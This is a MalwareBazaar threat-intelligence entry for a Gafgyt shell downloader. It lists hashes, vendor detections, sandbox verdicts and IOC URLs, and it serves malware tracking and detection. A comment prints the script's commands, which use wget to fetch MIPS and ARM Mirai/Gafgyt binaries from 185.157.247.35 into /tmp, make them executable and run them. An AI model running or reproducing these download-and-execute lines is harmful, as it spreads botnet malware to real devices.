MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 a02b076dd32c91403c500e9c8e8ee3fd36e29725f4bd3336e9d31b38a51a85b6. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Gafgyt


Vendor detections: 6


Intelligence 6 IOCs YARA File information Comments 1
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: a02b076dd32c91403c500e9c8e8ee3fd36e29725f4bd3336e9d31b38a51a85b6
SHA3-384 hash: 701551c2f6c2e68d57876d65324202c5b293be5a65b2a276c8ad4f2cb123c0f12b9e089eacb42f11284c9e7d8d4b5dd1
SHA1 hash: 676a118f9f26c21e43e4ad6dd218e01087f836ff
MD5 hash: 5957e5d91936d38be2a9528ee1dd6e56
humanhash: south-timing-colorado-muppet
File name:fx
Download: download sample
Signature Gafgyt
Create hunting rule
File size:1'589 bytes
First seen:2024-12-27 22:51:06 UTC
Last seen:Never
File type: sh
MIME type:text/plain
ssdeep 24:EwnmxwfKWEjwJoo6soe3goSsoe36Pe3efyoe3ed5Qe38ATz8Wve3NU/e3Y:EwQwf6jwJt6m1Sm60efy7ed58u8WU+EY
TLSH T1F63187132B4C34F4B7CDA50AB2A3DBE669DDC09F2A030705D83982EA7C95A241E35E30
Magika shell
Reporter abuse_ch
Tags:gafgyt sh
URLMalware sample (SHA256 hash)SignatureTags
http://185.157.247.35/mips4fc73b02bd0cc4d44ee8da03ce5ab8b74fb67409fb223c3f36b06dc22dc0dd74 Gafgyt32-bit elf gafgyt mirai
http://185.157.247.35/arm7d2ea0eed1f82458ed76a956ca3fd1f72d1c1e29b40a6118d1e5f1e6d78418077 Miraielf mirai
http://185.157.247.35/arm2f66b28645b910c0fcb7a751e9a0dad86fd2be825d07f45dd6ab086ec2eeafc0 Mirai32-bit elf mirai

Intelligence

File Origin
# of uploads :
1
# of downloads :
95
Origin country :
DE DE
Vendor Threat Intelligence
Detection(s):
SecuriteInfo.com.Linux.Downloader-35.UNOFFICIAL
Create hunting rule

Verdict:
Malicious
Score:
93.3%
Link:
https://cyber-fortress.com/docs/result/index.php?id=676faf1375fb913a1478dd4elinux22vpnfull_triage
Tags:
downloader adware mirai virus
Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
anti-debug evasive
Link:
https://www.filescan.io/uploads/676f2f92d986a2005f8d717d/reports/62f971bb-2b47-4745-af1b-1a7dac5410a6/overview
Verdict:
Malicious
Labled as:
TrojanDownloader/Linux.Agent
Link:
https://www.hybrid-analysis.com/sample/a02b076dd32c91403c500e9c8e8ee3fd36e29725f4bd3336e9d31b38a51a85b6
Result
Verdict:
UNKNOWN
Score:
0%
Verdict:
Benign
File Type:
SCRIPT
Link:
https://malprob.io/report/a02b076dd32c91403c500e9c8e8ee3fd36e29725f4bd3336e9d31b38a51a85b6
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/a02b076dd32c91403c500e9c8e8ee3fd36e29725f4bd3336e9d31b38a51a85b6/
Threat name:
Linux.Downloader.Generic
Create hunting rule
Status:
Suspicious
First seen:
2024-12-27 23:02:22 UTC
File Type:
Text
AV detection:
7 of 23 (30.43%)
Threat level:
  3/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=uavqo3otfsiuapcqb2oi5dxd7u3offzf6s6tgnxj2mntrji2qw3a._file
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Legit
Score:
0.00
Link:
https://yomi.yoroi.company/submissions/a02b076dd32c91403c500e9c8e8ee3fd36e29725f4bd3336e9d31b38a51a85b6

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

Gafgyt

sh a02b076dd32c91403c500e9c8e8ee3fd36e29725f4bd3336e9d31b38a51a85b6

(this sample)

Gafgyt

elf 4fc73b02bd0cc4d44ee8da03ce5ab8b74fb67409fb223c3f36b06dc22dc0dd74

  
URLhaus
https://urlhaus.abuse.ch/url/3376029/
  
Delivery method
Distributed via web download
  
Dropping
MD5 ebaf6768ac8705e48d2403468bf8df74
  
Dropping
SHA256 4fc73b02bd0cc4d44ee8da03ce5ab8b74fb67409fb223c3f36b06dc22dc0dd74

Comments


Avatar
commented on 2024-12-28 08:14:50 UTC

cd /tmp; rm -rf mips; wget http://185.157.247.35/mips; chmod 777 mips; ./mips fbnew.mips;
cd /tmp; rm -rf arm7; wget http://185.157.247.35/arm7; chmod 777 arm7; ./arm7 fbnew.arm;
cd /tmp; rm -rf arm; wget http://185.157.247.35/arm; chmod 777 arm; ./arm fbnew.arm;